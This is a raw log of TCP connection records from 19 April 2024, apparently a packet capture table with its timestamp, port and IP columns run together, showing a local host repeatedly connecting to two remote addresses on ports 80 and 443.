                                                                                                                                    Apr 19, 2024 13:42:37.290421963 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.290528059 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.291054010 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.291153908 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.291600943 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.293764114 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.293838978 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.369781971 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.369874001 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.369956970 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.396234035 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.396292925 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.396503925 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.474246025 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.474834919 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.474993944 CEST4974880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.501287937 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.501347065 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.501382113 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.501383066 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.501421928 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.501439095 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.509172916 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.509375095 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.513623953 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.513689995 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.513947964 CEST4434974934.117.186.192192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.579307079 CEST8049748104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.587512016 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.605966091 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.606069088 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.606549025 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.607110977 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.647352934 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.647424936 CEST4974780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:37.675621033 CEST49749443192.168.2.434.117.186.192
                                                                                                                                    Apr 19, 2024 13:42:37.710906029 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:37.710963011 CEST8049747104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.444683075 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.567887068 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.568571091 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.672705889 CEST8049762104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.672791958 CEST4976280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.673243046 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.673324108 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.673417091 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.777919054 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.777977943 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:43.778137922 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:43.882801056 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.129538059 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.129601002 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.129652977 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.388788939 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.389205933 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.493689060 CEST8049763104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.493758917 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.493841887 CEST4976380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.493904114 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.655472040 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.760026932 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.761169910 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:44.766926050 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:44.871901989 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:45.123068094 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:45.123131990 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:45.123378992 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.483550072 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.588154078 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.588263035 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.594906092 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.615731955 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.699558020 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.699615002 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.699899912 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.720212936 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.720484972 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.720484972 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.804733992 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.825052977 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.825110912 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.825397968 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:46.932939053 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.957077980 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.957139015 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:46.957220078 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.097349882 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.097381115 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.097563982 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.221528053 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.221581936 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.222002983 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.222119093 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.326606035 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.326668024 CEST8049765104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.326694965 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.326822042 CEST8049766104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.326869965 CEST4976580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.326900959 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.327096939 CEST4976680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.327207088 CEST8049764104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.327318907 CEST4976480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.431381941 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.431791067 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.435801983 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.540453911 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.804562092 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.804625988 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:47.805222034 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.939798117 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:47.941648006 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.047456026 CEST8049767104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.047539949 CEST4976780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.048835993 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.048926115 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.049266100 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.153775930 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.153839111 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.154284000 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.259099007 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.517513990 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.517577887 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.517627954 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.650852919 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.651434898 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.755987883 CEST8049768104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.756051064 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.756108046 CEST4976880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.756139040 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.756247044 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.860625029 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.861033916 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:48.861207008 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:48.965909004 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.271919012 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.271981955 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.272043943 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.393722057 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.394220114 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.498718977 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.498802900 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.498908043 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.499660969 CEST8049769104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.499715090 CEST4976980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.603430986 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.603596926 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.603746891 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:49.708255053 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.974124908 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.974186897 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:49.974266052 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.097879887 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.098381996 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.202903986 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.203480005 CEST8049770104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.203577995 CEST4977080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.203712940 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.203712940 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.308069944 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.308199883 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.308363914 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.413033009 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.572441101 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.572505951 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.572554111 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.712311983 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.713025093 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.817548037 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.817606926 CEST8049771104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.817692995 CEST4977180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.817934990 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.817934990 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:50.922272921 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.922333002 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:50.922662973 CEST4977280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:51.027116060 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:51.285429001 CEST8049772104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.406553030 CEST8049786104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.406608105 CEST4978680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.406640053 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.406685114 CEST4978580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.406861067 CEST4978780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.406861067 CEST4978780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.512176991 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.512396097 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.512777090 CEST4978780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.617372990 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.777456045 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.777519941 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.777825117 CEST4978780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.894074917 CEST4978780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.894572973 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.999056101 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.999114990 CEST8049787104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:58.999136925 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.999293089 CEST4978780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:58.999324083 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.103835106 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.103987932 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.105281115 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.209688902 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.501168013 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.501235962 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.501301050 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.658730030 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.659353971 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.763824940 CEST8049788104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.763887882 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.763955116 CEST4978880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.763974905 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.764090061 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.868288040 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.868505955 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:42:59.868673086 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:42:59.973437071 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.261042118 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.261101961 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.261209011 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.379136086 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.379421949 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.484848976 CEST8049789104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.484913111 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.484915972 CEST4978980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.484994888 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.485090971 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.591054916 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.591140032 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.591305971 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.696165085 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.854088068 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.854151011 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:00.854208946 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.983258963 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:00.983772039 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.088329077 CEST8049790104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.088387966 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.088398933 CEST4979080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.088471889 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.088618994 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.194667101 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.195034981 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.195213079 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.299900055 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.445652962 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.445719004 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.445899963 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.576598883 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.577682018 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.681623936 CEST8049791104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.681987047 CEST4979180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.682385921 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.682461023 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.690337896 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.795151949 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.795814037 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:01.796107054 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:01.902335882 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:02.146584988 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:02.146616936 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:02.146809101 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.363399029 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.363990068 CEST4979380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.468800068 CEST8049792104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:03.468863964 CEST8049793104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:03.468920946 CEST4979280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.469094038 CEST4979380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.511203051 CEST4979380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.616086960 CEST8049793104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:03.616178989 CEST8049793104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:03.737971067 CEST4979380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.842808962 CEST8049793104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:03.875967026 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.902549028 CEST4979380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.980571032 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:03.980689049 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:03.980906010 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.008276939 CEST8049793104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.008485079 CEST4979380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.085191011 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.085345984 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.085561037 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.190491915 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.342792034 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.342856884 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.342919111 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.457866907 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.458702087 CEST4979580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.562916994 CEST8049794104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.562995911 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.563016891 CEST4979480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.563210011 CEST4979580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.563292027 CEST4979580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.667777061 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.667834997 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.668189049 CEST4979580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:04.772907972 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.919308901 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.919373035 CEST8049795104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:04.919569969 CEST4979580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:05.033184052 CEST4979580192.168.2.4104.21.57.61
